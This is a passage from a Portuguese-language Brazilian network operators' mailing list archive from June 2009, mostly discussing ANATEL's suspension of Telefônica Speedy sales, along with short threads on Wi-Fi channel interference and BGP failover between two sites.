> investimento feito(se ? que ser? feito) n?o prejudicar? os lucros, com a > justificativa que "o governo nos atrapalhou". > > E claro, contrata??o de funcion?rios bem menos qualificados que os atuais > para a m?dio prazo deteriorar qualquer melhoria. > > Duvido que esta puni??o trar? algo de bom, acredito que v? terminar em uma > bela pizza a moda com borda rechada. > > > > > > > -----Mensagem original----- > > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > > Em nome de Eduardo Schoedler > > Enviada em: segunda-feira, 22 de junho de 2009 15:45 > > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > > Assunto: Re: [GTER] RES: [OFF] Telef?nica, complicou!!! > > > > Felipe, veja que est?o falando de Speedy. > > At? onde eu sei, Speedy ? o nome do produto de ?ltima milha. > > > > Logo, n?o espere muitas mudan?as em infra de backhaul / backbone. > > > > Eduardo. > > > > > > ----- Original Message ----- > > From: "Felipe Costa" > > To: "'Grupo de Trabalho de Engenharia e Operacao de Redes'" > > > > Sent: Monday, June 22, 2009 3:24 PM > > Subject: [GTER] RES: [OFF] Telef?nica, complicou!!! > > > > > > Gostaria de ver a cara daquele Dir. Financeiro que sempre bloqueou > > os projetos de melhora na rede dizendo n?o temos or?amento para isso no > > momento. Agora ? OBRIGADO a investir. Pessoal de infra soltando > > foguete.huauhauhauhahu > > > > Felipe Costa > > Gestor de TI > > felipe at cescage.edu.br > > > > -----Mensagem original----- > > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > > Em > > nome de Eduardo Schoedler > > Enviada em: segunda-feira, 22 de junho de 2009 14:36 > > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > > Assunto: Re: [GTER] [OFF] Telef?nica, complicou!!! > > > > Ao menos j? existe um precedente! > > > > Abra?o, > > Eduardo. > > > > > > ----- Original Message ----- > > From: "Francisco Henrique" > > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > > > > Sent: Monday, June 22, 2009 11:53 AM > > Subject: Re: [GTER] [OFF] Telef?nica, complicou!!! > > > > > > Infelizmente, o Velox est? indo pelo mesmo caminho > > > > 2009/6/22 Rubens Kuhl > > > > > http://www.urbandictionary.com/define.php?term=cluebat > > > > > > > > > Rubens > > > > > > 2009/6/22 Danton Nunes > > > > > > > > On Mon, 22 Jun 2009, M?rcio Luciano Donada wrote: > > > > > > > >> Acho que dessa vez complicou [1] > > > >> > > > >> [1]. > > > >> > > > > > http://g1.globo.com/Noticias/Tecnologia/0,,MUL1202787-6174,00- > > ANATEL+DETERMI > > NA+SUSPENSAO+DE+COMERCIALIZACAO+DO+SPEEDY.html > > > >> -- > > > > > > > > sinceramente, eu acho pouco! > > > > -- > > ============= > > Francisco Henrique C. Ferreira > > francisco.henrique at gmail.com > > UIN: 5328093 > > Linux Registered User #368514 > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From rubensk at gmail.com Mon Jun 22 16:44:19 2009 From: rubensk at gmail.com (Rubens Kuhl) Date: Mon, 22 Jun 2009 16:44:19 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_=5BOFF=5D_Telef=F4nica=2C_complicou!?= =?iso-8859-1?q?!!?= In-Reply-To: <000901c9f366$a4b7ea20$ee27be60$@edu.br> References: <4A3F7FF0.70902@auroraalimentos.com.br> <6bb5f5b10906220742h53a9ddadoccc70f7e6a5c7a9e@mail.gmail.com> <138bd4780906220753jc521e5ap4c553be30c5faac4@mail.gmail.com> <1D4EFC657D314B9198771CB00C512FAF@admgaz.com.br> <000901c9f366$a4b7ea20$ee27be60$@edu.br> Message-ID: <6bb5f5b10906221244wf7ce129l7fdd31c0a03faf78@mail.gmail.com> Dizem as lendas, aquelas contadas com XSL*>3, de que alguns equipamentos que poderiam ajudar estabilizar a rede da Telef?nica est?o comprados mas ainda nas respectivas caixas. Assim, se n?o havia ningu?m para coloc?-los, pode ser que n?o haja ningu?m para comemorar. Rubens * XSL - Xingu Security Level, vide http://www.cervejaxingu.com.br/ 2009/6/22 Felipe Costa : > ? ? ? ?Gostaria de ver a cara daquele Dir. Financeiro que sempre bloqueou > os projetos de melhora na rede dizendo n?o temos or?amento para isso no > momento. Agora ? OBRIGADO a investir. Pessoal de infra soltando > foguete.huauhauhauhahu From frederick at dahype.org Mon Jun 22 16:48:26 2009 From: frederick at dahype.org (Renato Frederick) Date: Mon, 22 Jun 2009 15:48:26 -0400 Subject: [GTER] =?iso-8859-1?q?RES=3A_=5BOFF=5D_Telef=F4nica=2C_complicou!?= =?iso-8859-1?q?!!?= In-Reply-To: References: Message-ID: Est? claro que n?o poder?o vender at? - teoricamente - colocar ordem na casa e garantir par?metros aceit?veis de disponibilidade e qualidade. A quest?o ?, isto realmente se concretizar?? A telef?nica come?ar? a seguir boas pr?ticas? Isto se refletir? para o atendimento comercial que ? terr?vel, chegando ao ponto de demorar semanas para delegar um DNS reverso? Eu no meu pessimismo acredito que n?o, teremos uma melhoria para Ingl?s ver e ficar? tudo a curto prazo igual hoje. > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em nome de NOC NeoGrid > Enviada em: segunda-feira, 22 de junho de 2009 16:43 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: [GTER] RES: [OFF] Telef?nica, complicou!!! > > Segundo o Di?rio Oficial da Uni?o... N? 116, segunda-feira, 22 de junho > de 2009.... > > N? 4.043/2009-CD - Processo no 53500.011781/ 2009 > > O CONSELHO DIRETOR DA AG?NCIA NACIONAL DE TELECOMUNICA??ES, no uso das > atribui??es que lhe foram conferidas pelo art. 22 da Lei n.? 9.472, de > 16 de julho de 1997, pelo art. > 35 do Regulamento da Ag?ncia Nacional de Telecomunica??es, aprovado > pelo Decreto n.? 2.338, de 7 de outubro de 1997, e pelo art. 175 do > Regimento Interno da Ag?ncia, aprovado pela Resolu??o n.? 270, de 19 de > julho de 2001 e alterado pela Resolu??o n.? 489, de 5 de dezembro de > 2007, Considerando a crescente evolu??o das reclama??es de usu?rios do > Servi?o de Comunica??o Multim?dia comercializado como "SERVI?O SPEEDY" > pela Telecomunica??es de S?o Paulo S/A e a constata??o de que n?mero > expressivo de usu?rios foi atingido por interrup??es reiteradas, que > inclusive motivaram a abertura dos Procedimentos para Apura??o de > Descumprimento de Obriga??es - PADO(s) n. 53504.020157/2008 e > 53504.016748/2008; Considerando as conseq??ncias das diversas > interrup??es na presta??o do Servi?o de Comunica??o Multim?dia pela > Telecomu- > nica??es de S?o Paulo S/A, no Estado de S?o Paulo, comercializado como > "SERVI?O SPEEDY"................ PROIBIDA A VENDA... > > Att, > > Dilson. > > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em nome de Renato Frederick > Enviada em: segunda-feira, 22 de junho de 2009 15:49 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: [GTER] RES: RES: [OFF] Telef?nica, complicou!!! > > Ou ent?o daqui a alguns meses uma demiss?o em massa para garantir que o > investimento feito(se ? que ser? feito) n?o prejudicar? os lucros, com > a justificativa que "o governo nos atrapalhou". > > E claro, contrata??o de funcion?rios bem menos qualificados que os > atuais para a m?dio prazo deteriorar qualquer melhoria. > > Duvido que esta puni??o trar? algo de bom, acredito que v? terminar em > uma bela pizza a moda com borda rechada. > > > > > > > -----Mensagem original----- > > De: gter-bounces at eng.registro.br [mailto:gter- > bounces at eng.registro.br] > > Em nome de Eduardo Schoedler > > Enviada em: segunda-feira, 22 de junho de 2009 15:45 > > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > > Assunto: Re: [GTER] RES: [OFF] Telef?nica, complicou!!! > > > > Felipe, veja que est?o falando de Speedy. > > At? onde eu sei, Speedy ? o nome do produto de ?ltima milha. > > > > Logo, n?o espere muitas mudan?as em infra de backhaul / backbone. > > > > Eduardo. > > > > > > ----- Original Message ----- > > From: "Felipe Costa" > > To: "'Grupo de Trabalho de Engenharia e Operacao de Redes'" > > > > Sent: Monday, June 22, 2009 3:24 PM > > Subject: [GTER] RES: [OFF] Telef?nica, complicou!!! > > > > > > Gostaria de ver a cara daquele Dir. Financeiro que sempre bloqueou > > os projetos de melhora na rede dizendo n?o temos or?amento para isso > no > > momento. Agora ? OBRIGADO a investir. Pessoal de infra soltando > > foguete.huauhauhauhahu > > > > Felipe Costa > > Gestor de TI > > felipe at cescage.edu.br > > > > -----Mensagem original----- > > De: gter-bounces at eng.registro.br [mailto:gter- > bounces at eng.registro.br] > > Em > > nome de Eduardo Schoedler > > Enviada em: segunda-feira, 22 de junho de 2009 14:36 > > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > > Assunto: Re: [GTER] [OFF] Telef?nica, complicou!!! > > > > Ao menos j? existe um precedente! > > > > Abra?o, > > Eduardo. > > > > > > ----- Original Message ----- > > From: "Francisco Henrique" > > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > > > > Sent: Monday, June 22, 2009 11:53 AM > > Subject: Re: [GTER] [OFF] Telef?nica, complicou!!! > > > > > > Infelizmente, o Velox est? indo pelo mesmo caminho > > > > 2009/6/22 Rubens Kuhl > > > > > http://www.urbandictionary.com/define.php?term=cluebat > > > > > > > > > Rubens > > > > > > 2009/6/22 Danton Nunes > > > > > > > > On Mon, 22 Jun 2009, M?rcio Luciano Donada wrote: > > > > > > > >> Acho que dessa vez complicou [1] > > > >> > > > >> [1]. > > > >> > > > > > http://g1.globo.com/Noticias/Tecnologia/0,,MUL1202787-6174,00- > > ANATEL+DETERMI > > NA+SUSPENSAO+DE+COMERCIALIZACAO+DO+SPEEDY.html > > > >> -- > > > > > > > > sinceramente, eu acho pouco! > > > > -- > > ============= > > Francisco Henrique C. Ferreira > > francisco.henrique at gmail.com > > UIN: 5328093 > > Linux Registered User #368514 > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From alexandre at onda.psi.br Mon Jun 22 16:59:14 2009 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Mon, 22 Jun 2009 16:59:14 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_=5BOFF=5D_Telef=F4nica=2C_complicou!?= =?iso-8859-1?q?!!?= In-Reply-To: References: Message-ID: <4A3FE292.7030503@onda.psi.br> tamb?m tenho esse pensamento pessimista... Renato Frederick wrote: > Est? claro que n?o poder?o vender at? - teoricamente - colocar ordem na casa e garantir par?metros aceit?veis de disponibilidade e qualidade. > > A quest?o ?, isto realmente se concretizar?? A telef?nica come?ar? a seguir boas pr?ticas? Isto se refletir? para o atendimento comercial que ? terr?vel, chegando ao ponto de demorar semanas para delegar um DNS reverso? > > Eu no meu pessimismo acredito que n?o, teremos uma melhoria para Ingl?s ver e ficar? tudo a curto prazo igual hoje. > > > > > > > >> -----Mensagem original----- >> De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] >> Em nome de NOC NeoGrid >> Enviada em: segunda-feira, 22 de junho de 2009 16:43 >> Para: Grupo de Trabalho de Engenharia e Operacao de Redes >> Assunto: [GTER] RES: [OFF] Telef?nica, complicou!!! >> >> Segundo o Di?rio Oficial da Uni?o... N? 116, segunda-feira, 22 de junho >> de 2009.... >> >> N? 4.043/2009-CD - Processo no 53500.011781/ 2009 >> >> O CONSELHO DIRETOR DA AG?NCIA NACIONAL DE TELECOMUNICA??ES, no uso das >> atribui??es que lhe foram conferidas pelo art. 22 da Lei n.? 9.472, de >> 16 de julho de 1997, pelo art. >> 35 do Regulamento da Ag?ncia Nacional de Telecomunica??es, aprovado >> pelo Decreto n.? 2.338, de 7 de outubro de 1997, e pelo art. 175 do >> Regimento Interno da Ag?ncia, aprovado pela Resolu??o n.? 270, de 19 de >> julho de 2001 e alterado pela Resolu??o n.? 489, de 5 de dezembro de >> 2007, Considerando a crescente evolu??o das reclama??es de usu?rios do >> Servi?o de Comunica??o Multim?dia comercializado como "SERVI?O SPEEDY" >> pela Telecomunica??es de S?o Paulo S/A e a constata??o de que n?mero >> expressivo de usu?rios foi atingido por interrup??es reiteradas, que >> inclusive motivaram a abertura dos Procedimentos para Apura??o de >> Descumprimento de Obriga??es - PADO(s) n. 53504.020157/2008 e >> 53504.016748/2008; Considerando as conseq??ncias das diversas >> interrup??es na presta??o do Servi?o de Comunica??o Multim?dia pela >> Telecomu- >> nica??es de S?o Paulo S/A, no Estado de S?o Paulo, comercializado como >> "SERVI?O SPEEDY"................ PROIBIDA A VENDA... >> >> Att, >> >> Dilson. >> >> -----Mensagem original----- >> De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] >> Em nome de Renato Frederick >> Enviada em: segunda-feira, 22 de junho de 2009 15:49 >> Para: Grupo de Trabalho de Engenharia e Operacao de Redes >> Assunto: [GTER] RES: RES: [OFF] Telef?nica, complicou!!! >> >> Ou ent?o daqui a alguns meses uma demiss?o em massa para garantir que o >> investimento feito(se ? que ser? feito) n?o prejudicar? os lucros, com >> a justificativa que "o governo nos atrapalhou". >> >> E claro, contrata??o de funcion?rios bem menos qualificados que os >> atuais para a m?dio prazo deteriorar qualquer melhoria. >> >> Duvido que esta puni??o trar? algo de bom, acredito que v? terminar em >> uma bela pizza a moda com borda rechada. >> >> >> >> >> >> >>> -----Mensagem original----- >>> De: gter-bounces at eng.registro.br [mailto:gter- >>> >> bounces at eng.registro.br] >> >>> Em nome de Eduardo Schoedler >>> Enviada em: segunda-feira, 22 de junho de 2009 15:45 >>> Para: Grupo de Trabalho de Engenharia e Operacao de Redes >>> Assunto: Re: [GTER] RES: [OFF] Telef?nica, complicou!!! >>> >>> Felipe, veja que est?o falando de Speedy. >>> At? onde eu sei, Speedy ? o nome do produto de ?ltima milha. >>> >>> Logo, n?o espere muitas mudan?as em infra de backhaul / backbone. >>> >>> Eduardo. >>> >>> >>> ----- Original Message ----- >>> From: "Felipe Costa" >>> To: "'Grupo de Trabalho de Engenharia e Operacao de Redes'" >>> >>> Sent: Monday, June 22, 2009 3:24 PM >>> Subject: [GTER] RES: [OFF] Telef?nica, complicou!!! >>> >>> >>> Gostaria de ver a cara daquele Dir. Financeiro que sempre bloqueou >>> os projetos de melhora na rede dizendo n?o temos or?amento para isso >>> >> no >> >>> momento. Agora ? OBRIGADO a investir. Pessoal de infra soltando >>> foguete.huauhauhauhahu >>> >>> Felipe Costa >>> Gestor de TI >>> felipe at cescage.edu.br >>> >>> -----Mensagem original----- >>> De: gter-bounces at eng.registro.br [mailto:gter- >>> >> bounces at eng.registro.br] >> >>> Em >>> nome de Eduardo Schoedler >>> Enviada em: segunda-feira, 22 de junho de 2009 14:36 >>> Para: Grupo de Trabalho de Engenharia e Operacao de Redes >>> Assunto: Re: [GTER] [OFF] Telef?nica, complicou!!! >>> >>> Ao menos j? existe um precedente! >>> >>> Abra?o, >>> Eduardo. >>> >>> >>> ----- Original Message ----- >>> From: "Francisco Henrique" >>> To: "Grupo de Trabalho de Engenharia e Operacao de Redes" >>> >>> Sent: Monday, June 22, 2009 11:53 AM >>> Subject: Re: [GTER] [OFF] Telef?nica, complicou!!! >>> >>> >>> Infelizmente, o Velox est? indo pelo mesmo caminho >>> >>> 2009/6/22 Rubens Kuhl >>> >>> >>>> http://www.urbandictionary.com/define.php?term=cluebat >>>> >>>> >>>> Rubens >>>> >>>> 2009/6/22 Danton Nunes >>>> >>>>> On Mon, 22 Jun 2009, M?rcio Luciano Donada wrote: >>>>> >>>>> >>>>>> Acho que dessa vez complicou [1] >>>>>> >>>>>> [1]. >>>>>> >>>>>> >>> http://g1.globo.com/Noticias/Tecnologia/0,,MUL1202787-6174,00- >>> ANATEL+DETERMI >>> NA+SUSPENSAO+DE+COMERCIALIZACAO+DO+SPEEDY.html >>> >>>>>> -- >>>>>> >>>>> sinceramente, eu acho pouco! >>>>> >>> -- >>> ============= >>> Francisco Henrique C. Ferreira >>> francisco.henrique at gmail.com >>> UIN: 5328093 >>> Linux Registered User #368514 >>> >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- Sds. Alexandre Jeronimo Correa Onda Internet www.onda.net.br IPV6 Ready ! www.ipv6.onda.net.br From edinilson at atinet.com.br Mon Jun 22 17:07:13 2009 From: edinilson at atinet.com.br (Edinilson - ATINET) Date: Mon, 22 Jun 2009 17:07:13 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_=09RES=3A__=5BOFF=5D_Telef=F4nica=2C?= =?iso-8859-1?q?_complicou!!!?= References: <4A3F7FF0.70902@auroraalimentos.com.br><6bb5f5b10906220742h53a9ddadoccc70f7e6a5c7a9e@mail.gmail.com><138bd4780906220753jc521e5ap4c553be30c5faac4@mail.gmail.com><1D4EFC657D314B9198771CB00C512FAF@admgaz.com.br><000901c9f366$a4b7ea20$ee27be60$@edu.br><4D0A48D2689C4B0CB1F9F8DBA53F8A69@admgaz.com.br> Message-ID: <334D668A71874E92BC815FF35FFAEA4C@atinet.com.br> Acredito que esteja acontecendo AGORA no Brasil o que j? aconteceu h? alguns anos atras na Argentina e outros pa?ses onde a Telefonica atua. Edinilson --------------------------------------------------------- ATINET-Professional Web Hosting Tel Voz: (0xx11) 4412-0876 http://www.atinet.com.br ----- Original Message ----- From: "Renato Frederick" To: "Grupo de Trabalho de Engenharia e Operacao de Redes" Sent: Monday, June 22, 2009 3:49 PM Subject: [GTER] RES: RES: [OFF] Telef?nica, complicou!!! Ou ent?o daqui a alguns meses uma demiss?o em massa para garantir que o investimento feito(se ? que ser? feito) n?o prejudicar? os lucros, com a justificativa que "o governo nos atrapalhou". E claro, contrata??o de funcion?rios bem menos qualificados que os atuais para a m?dio prazo deteriorar qualquer melhoria. Duvido que esta puni??o trar? algo de bom, acredito que v? terminar em uma bela pizza a moda com borda rechada. From frederick at dahype.org Mon Jun 22 17:12:02 2009 From: frederick at dahype.org (Renato Frederick) Date: Mon, 22 Jun 2009 16:12:02 -0400 Subject: [GTER] =?iso-8859-1?q?RES=3A__RES=3A__RES=3A_=09RES=3A__=5BOFF=5D?= =?iso-8859-1?q?_Telef=F4nica=2C_complicou!!!?= In-Reply-To: <070CC1E405074ED9BF2AED705A7FDF74@INETWEB.local> References: <4A3F7FF0.70902@auroraalimentos.com.br><6bb5f5b10906220742h53a9ddadoccc70f7e6a5c7a9e@mail.gmail.com><138bd4780906220753jc521e5ap4c553be30c5faac4@mail.gmail.com><1D4EFC657D314B9198771CB00C512FAF@admgaz.com.br><000901c9f366$a4b7ea20$ee27be60$@edu.br><4D0A48D2689C4B0CB1F9F8DBA53F8A69@admgaz.com.br> <070CC1E405074ED9BF2AED705A7FDF74@INETWEB.local> Message-ID: Ali?s, relembrando o passado, algu?m sabe se as not?cias abaixo terminaram em algo que n?o fosse pizza? [...]Das reclama??es envolvendo proxy aberto, em janeiro, 14.975 vieram de m?quinas conectadas ? rede da Telef?nica, 10.854 da Telemar, 10.227 da Brasil Telecom, 5.947 da NET e 1.157 da CTBC.[1] [...] So - telefonica (Spains national telecomunications company, owner of Terra Lycos) has been blacklisted for not being able to cope with spam. Ridiculous - About 80% of all personal traffic in the country goes through these guys![2] [...]F?bio Bruggioni, diretor de neg?cios internet da empresa, destacou que a Telef?nica conta com dois endere?os de e-mail (abuse at telesp.net.br e security at telesp.com.br) para den?ncias de spam[...] [3] [1] http://idgnow.uol.com.br/internet/2006/02/14/idgnoticia.2006-02-14.6252096352/ [2] http://www.webmasterworld.com/forum10/5344.htm [3] http://www.baboo.com.br/absolutenm/templates/content.asp?articleid=7123&zoneid=4&resumo= PS: o item n?mero 3 ? o mais engra?ado. Procurei apenas textos relativos ao combate de SPAM, j? que se for procurar reclama??o junto aos PROCONS da qualidade de servi?o, a folha corrida d? para ligar SP ao Amazonas. > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em nome de Cleber - Listas > Enviada em: segunda-feira, 22 de junho de 2009 16:05 > Para: 'Grupo de Trabalho de Engenharia e Operacao de Redes' > Assunto: [GTER] RES: RES: RES: [OFF] Telef?nica, complicou!!! > > Eu acredito que esta puni??o somente est? ocorrendo pois ? um servi?o > de > grande escala e a popula??o faz press?o sobre o org?o. A Anatel ? > extremamente omissa quanto ? ao que lhe compete como "Org?o Regulador" > > Sinceramente, vai acabar em pizza! ? coisa de gente grande isso e rola > muito > $$ > > > > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em > nome de Renato Frederick > Enviada em: segunda-feira, 22 de junho de 2009 15:49 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: [GTER] RES: RES: [OFF] Telef?nica, complicou!!! > > Ou ent?o daqui a alguns meses uma demiss?o em massa para garantir que o > investimento feito(se ? que ser? feito) n?o prejudicar? os lucros, com > a > justificativa que "o governo nos atrapalhou". > > E claro, contrata??o de funcion?rios bem menos qualificados que os > atuais > para a m?dio prazo deteriorar qualquer melhoria. > > Duvido que esta puni??o trar? algo de bom, acredito que v? terminar em > uma > bela pizza a moda com borda rechada. > > > > > > > -----Mensagem original----- > > De: gter-bounces at eng.registro.br [mailto:gter- > bounces at eng.registro.br] > > Em nome de Eduardo Schoedler > > Enviada em: segunda-feira, 22 de junho de 2009 15:45 > > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > > Assunto: Re: [GTER] RES: [OFF] Telef?nica, complicou!!! > > > > Felipe, veja que est?o falando de Speedy. > > At? onde eu sei, Speedy ? o nome do produto de ?ltima milha. > > > > Logo, n?o espere muitas mudan?as em infra de backhaul / backbone. > > > > Eduardo. > > > > > > ----- Original Message ----- > > From: "Felipe Costa" > > To: "'Grupo de Trabalho de Engenharia e Operacao de Redes'" > > > > Sent: Monday, June 22, 2009 3:24 PM > > Subject: [GTER] RES: [OFF] Telef?nica, complicou!!! > > > > > > Gostaria de ver a cara daquele Dir. Financeiro que sempre bloqueou os > > projetos de melhora na rede dizendo n?o temos or?amento para isso no > > momento. Agora ? OBRIGADO a investir. Pessoal de infra soltando > > foguete.huauhauhauhahu > > > > Felipe Costa > > Gestor de TI > > felipe at cescage.edu.br > > > > -----Mensagem original----- > > De: gter-bounces at eng.registro.br [mailto:gter- > bounces at eng.registro.br] > > Em > > nome de Eduardo Schoedler > > Enviada em: segunda-feira, 22 de junho de 2009 14:36 > > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > > Assunto: Re: [GTER] [OFF] Telef?nica, complicou!!! > > > > Ao menos j? existe um precedente! > > > > Abra?o, > > Eduardo. > > > > > > ----- Original Message ----- > > From: "Francisco Henrique" > > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > > > > Sent: Monday, June 22, 2009 11:53 AM > > Subject: Re: [GTER] [OFF] Telef?nica, complicou!!! > > > > > > Infelizmente, o Velox est? indo pelo mesmo caminho > > > > 2009/6/22 Rubens Kuhl > > > > > http://www.urbandictionary.com/define.php?term=cluebat > > > > > > > > > Rubens > > > > > > 2009/6/22 Danton Nunes > > > > > > > > On Mon, 22 Jun 2009, M?rcio Luciano Donada wrote: > > > > > > > >> Acho que dessa vez complicou [1] > > > >> > > > >> [1]. > > > >> > > > > > http://g1.globo.com/Noticias/Tecnologia/0,,MUL1202787-6174,00- > > ANATEL+DETERMI > > NA+SUSPENSAO+DE+COMERCIALIZACAO+DO+SPEEDY.html > > > >> -- > > > > > > > > sinceramente, eu acho pouco! > > > > -- > > ============= > > Francisco Henrique C. Ferreira > > francisco.henrique at gmail.com > > UIN: 5328093 > > Linux Registered User #368514 > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > -- > gter list https://eng.registro.br/mailman/listinfo/gter > Nenhum v?rus encontrado nessa mensagem recebida. > Verificado por AVG - www.avgbrasil.com.br > Vers?o: 8.5.339 / Banco de dados de v?rus: 270.12.87/2195 - Data de > Lan?amento: 06/22/09 06:54:00 > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From MBORBA at trf3.jus.br Mon Jun 22 17:38:43 2009 From: MBORBA at trf3.jus.br (MARLON BORBA) Date: Mon, 22 Jun 2009 17:38:43 -0300 Subject: [GTER] "Clash" de canais no Wi-Fi. In-Reply-To: <20090617180719.M4125@centroin.com.br> References: <4A38F3DE.15A6.0046.0@trf3.jus.br> <20090617180719.M4125@centroin.com.br> Message-ID: <4A3FC15F.15A6.0046.0@trf3.jus.br> Prezados, O AP foi reconfigurado e est? operando no canal 9. Estou conectado desde o in?cio da tarde e n?o aconteceram quaisquer interrup??es. -- Abra?os, Marlon Borba, CISSP, APC DataCenter Associate T?cnico Judici?rio ? Seguran?a da Informa??o Comiss?o Local de Resposta a Incidentes - CLRI TRF 3 Regi?o (11) 3012-1581 -- Practically no IT system is risk free. (NIST Special Publication 800-30) -- Em 17/6/2009 ?s 15:09, "Roberto Machado" gravou: > Salve! > > Olha, eu lembro de ter ouvido falar alguma coisa a esse respeito na Security > > Now. Estas desconex?es s?o um poss?vel comportamento do Wireless Zero > Configuration. Para maiores detalhes: > > http://www.grc.com/sn/sn-134.htm > > (procure pela string Zero Configuration) > > H? um utilit?rio tamb?m para desligar o servi?o (wizmo wanlock). > > []s, Roberto From net.hitch.adm at gmail.com Tue Jun 23 02:41:28 2009 From: net.hitch.adm at gmail.com (Hitch Cock) Date: Tue, 23 Jun 2009 02:41:28 -0300 Subject: [GTER] bgp failover Message-ID: Prezados, algu?m teria um exemplo de configura??o do quagga em um ambiente bgp de acordo com o senario abaixo |---------- LINK1 ------------| site-a site-b |---------- LINK2 ------------| Tenho algumas redes que v?o pelo LINK1 e outras pelo LINK2. Caso algum dos links fique indispon?vel todo o tr?fego seja direcionado para o link dispon?vel. No site-a tenho as redes 192.168.100/24 192.168.200/24 172.16.1/24 e no site-b tenho 192.168.101/24 192.168.201/24 10.4/16 10.5.0/24 O site-b sai para a internet atrav?s do site-a. Grato, Hitch From danton at inexo.com.br Tue Jun 23 13:19:51 2009 From: danton at inexo.com.br (Danton Nunes) Date: Tue, 23 Jun 2009 13:19:51 -0300 (BRT) Subject: [GTER] bgp failover In-Reply-To: References: Message-ID: On Tue, 23 Jun 2009, Hitch Cock wrote: > Prezados, > > algu?m teria um exemplo de configura??o do quagga em um ambiente bgp de > acordo com o senario abaixo > > |---------- LINK1 ------------| > site-a site-b > |---------- LINK2 ------------| usar BGP para isto ? como lavar porco com sabonete de luxo. rota est?tica e balanceamento resolvem. > Tenho algumas redes que v?o pelo LINK1 e outras pelo LINK2. Caso algum dos > links fique indispon?vel todo o tr?fego seja direcionado para o link > dispon?vel. mistura tudo que ? mais neg?cio. From frederick at dahype.org Tue Jun 23 13:46:59 2009 From: frederick at dahype.org (Renato Frederick) Date: Tue, 23 Jun 2009 12:46:59 -0400 Subject: [GTER] RES: bgp failover In-Reply-To: References: Message-ID: Os links s?o privados? Se for, OSPF + PBR atende sua necessidade, nem ? necess?rio usar BGP. Ali?s creio que no gateway se for bsd/Linux at? 2 rotas com m?tricas diferentes, cada qual para um link, atende a quest?o. > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em nome de Danton Nunes > Enviada em: ter?a-feira, 23 de junho de 2009 13:20 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] bgp failover > > On Tue, 23 Jun 2009, Hitch Cock wrote: > > > Prezados, > > > > algu?m teria um exemplo de configura??o do quagga em um ambiente bgp > de > > acordo com o senario abaixo > > > > |---------- LINK1 ------------| > > site-a site-b > > |---------- LINK2 ------------| > > usar BGP para isto ? como lavar porco com sabonete de luxo. rota > est?tica > e balanceamento resolvem. > > > Tenho algumas redes que v?o pelo LINK1 e outras pelo LINK2. Caso > algum dos > > links fique indispon?vel todo o tr?fego seja direcionado para o link > > dispon?vel. > > mistura tudo que ? mais neg?cio. > -- > gter list https://eng.registro.br/mailman/listinfo/gter From itamar at ispbrasil.com.br Tue Jun 23 13:01:10 2009 From: itamar at ispbrasil.com.br (Itamar Reis Peixoto) Date: Tue, 23 Jun 2009 13:01:10 -0300 Subject: [GTER] bgp failover In-Reply-To: References: Message-ID: s?o links ponto-a-ponto ? creio que existam outras alternativas melhores do que BGP 2009/6/23 Hitch Cock : > Prezados, > > algu?m teria um exemplo de configura??o do quagga em um ambiente bgp de > acordo com o senario abaixo > > ? ? ? ? ? |---------- LINK1 ------------| > site-a ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?site-b > ? ? ? ? ? |---------- LINK2 ------------| > > Tenho algumas redes que v?o pelo LINK1 e outras pelo LINK2. Caso algum dos > links fique indispon?vel todo o tr?fego seja direcionado para o link > dispon?vel. > > No site-a tenho as redes 192.168.100/24 192.168.200/24 172.16.1/24 e no > site-b tenho 192.168.101/24 192.168.201/24 10.4/16 10.5.0/24 > > O site-b sai para a internet atrav?s do site-a. > > Grato, > Hitch > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- ------------ Itamar Reis Peixoto e-mail/msn: itamar at ispbrasil.com.br sip: itamar at ispbrasil.com.br skype: itamarjp icq: 81053601 +55 11 4063 5033 +55 34 3221 8599 From mauriciomaehara at yahoo.com.br Tue Jun 23 17:43:01 2009 From: mauriciomaehara at yahoo.com.br (Mauricio Maehara) Date: Tue, 23 Jun 2009 13:43:01 -0700 (PDT) Subject: [GTER] Fwd: Problema com Speedy Message-ID: <367456.68746.qm@web53705.mail.re2.yahoo.com> Assunto: Problema com Speedy Para quem quiser abrir uma denuncia no Procon: http://www.procon.sp.gov.br/denunciaspeedy/ From jarruda-gter at jarruda.com 